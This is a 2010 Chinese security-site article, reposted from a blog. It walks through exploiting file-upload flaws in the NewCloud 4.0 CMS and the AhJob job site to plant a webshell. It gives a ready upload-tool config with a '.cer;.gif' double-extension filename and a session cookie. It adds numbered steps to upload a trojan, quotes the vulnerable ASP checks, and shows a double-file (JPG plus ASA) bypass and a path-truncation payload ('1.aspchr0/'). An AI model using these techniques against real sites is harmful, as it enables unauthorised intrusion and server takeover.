首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
新云4.0注册上传漏洞
来源:http://hi.baidu.com/seraph1221 作者:seraph1221 发布时间:2010-03-12  

转自:http://hi.baidu.com/seraph1221/blog/item/2fc0f9d3ba58fdd4a9ec9afe.html

先下载一个

serawebinfo

把下面配置文件保存为(xunyun.seraph)

url=http://localhost/users/upload.asp?action=save&ChannelID=1&sType=
filefield=File1
filefield2=
filename=200981623554.cer;.gif
filename2=
local=C:\Documents and Settings\seraph\桌面\1.jpg
local2=
type=text/html
type2=image/gif
cookies=pma_cookie_username-1=dXsYNCw7jXS1W0oq9sYg4g%3D%3D; style_cookie=null; AJSTAT_ok_times=1; lastvisit=3934%7C1266468378; csscolor=0; songhidden=0; NewAspUsers=UserToday=0%2C0%2C0%2C0%2C0%2C0&userlastip=127%2E0%2E0%2E1&UserGroup=%C6%D5%CD%A8%BB%E1%D4%B1&UserGrade=1&nickname=seraph&password=4283705e6519c904&UserClass=0&username=seraph&LastTime=2010%2D3%2D9+0%3A10%3A01&userid=1; ASPSESSIONIDSASQQRBT=BKLHHGICELEMHKBMKOBHIGBA; NewAspUsers%5FOnline=UserSessionID=8304709; usercookies%5F1=dayarticlenum=0&daysoftnum=0&userip=127%2E0%2E0%2E1; ASPSESSIONIDQCRRTRBS=PCOHKAJCAPDEFNADGPDDMLBM
name=uploadPic&value=1421
name=Rename&value=1

准备工作做好了,开始拿SHELL了

1先找一个可以注册上传图片的新云程序

2登录后抓取COOKIE内容

3打开软件,加载刚刚保存的配置文件

4.修改COOKIE以及上传的地址,网址

5.打开http://localhost/users/upload.asp?ChannelID=1,里面找到uploadpic的值

 

6.双击uploadpic,修改为刚刚得到的值,这是一个验证码,要保证没有刷新页面才行

7.本地文件第一个改成自己要上传的木马

8点击上传,如果上传失败则试试上传2,

8手动抓取上传地址,接下搂不用我教了吧

 

************************************************BK瞬间,华丽的分割线*************************************************
上传漏洞操作示例
双文件上传漏洞
有个双文件上传漏洞
=================================代码开始==========================================================
set file=upload.file(formName) '生成一个文件对象
   if file.filesize<100 then
     msg="请先选择你要上传的文件!"
    founderr=true
   end if
   if file.filesize>(MaxFileSize*1024) then
     msg="文件大小超过了限制,最大只能上传" & CStr(MaxFileSize) & "K的文件!"
    founderr=true
   end if
        fileExt=lcase(file.FileExt)
   Forumupload=split(UpFileType,"|")
   for i=0 to ubound(Forumupload)
    EnableUpload=false
    if fileEXT=trim(Forumupload(i)) then
     EnableUpload=true
     exit for
    end if
   next
   if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" or fileEXT="cer" or fileEXT="cdx" then
    EnableUpload=false
   end if
   if EnableUpload=false then
    msg="这种文件类型不允许上传!\n\n只允许上传这几种文件类型:" & UpFileType
    founderr=true
   end if
=================================代码结束===========================================================
只需要在上传文件1处写入一个JPG图片,文件2处写入一个ASA文件,就可以得到SHELL
附 双文件上传.seraph 加载可以看到具体设置


************************************************BK瞬间,淫荡的分割线*************************************************

文件目录截断上传
(AhJob人才网截漏上传漏洞upfile_flash.asp)
===================================代码开始=========================================================
filepath=trim(upload.form("filepath"))
filelx=trim(upload.form("filelx"))
.
.
.
filename=filepath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
if file.FileSize>0 then         ''如果 FileSize > 0 说明有文件数据

   file.SaveToFile Server.mappath(FileName)
end if
===================================代码结束==========================================================
先正常上传抓包,把包的内容复制到右边框,再转换抓包,双击filepath项,修改路径
如filepath原来的值是uploadfiles/,修改成uploadfiles/1.aspchr0/
上传后就可以得到http://localhost/uploadfiles/1.asp这个SHELL
附,(AhJob截断上传.seraph)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·网页编辑器漏洞手册(全面版)
·科讯 v6.5 CMS Oday
·快客电邮(QuarkMail)最新远程
·鼎峰企业智能建站系统注入搜索注
·搜狗浏览器“页面欺骗”漏洞
·远程包含和本地包含漏洞的原理
·Sablog-X 2.X 后台管理权限欺骗
·Sablog-X v2.x 任意变量覆盖漏洞
·MASA2EL Music City v1.0远程注
·Phpwind7.5 后台本地包含漏洞利
·Discuz!7.0-7.2后台settings.inc
·discuz! 7.0 及以下版本后台拿we
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved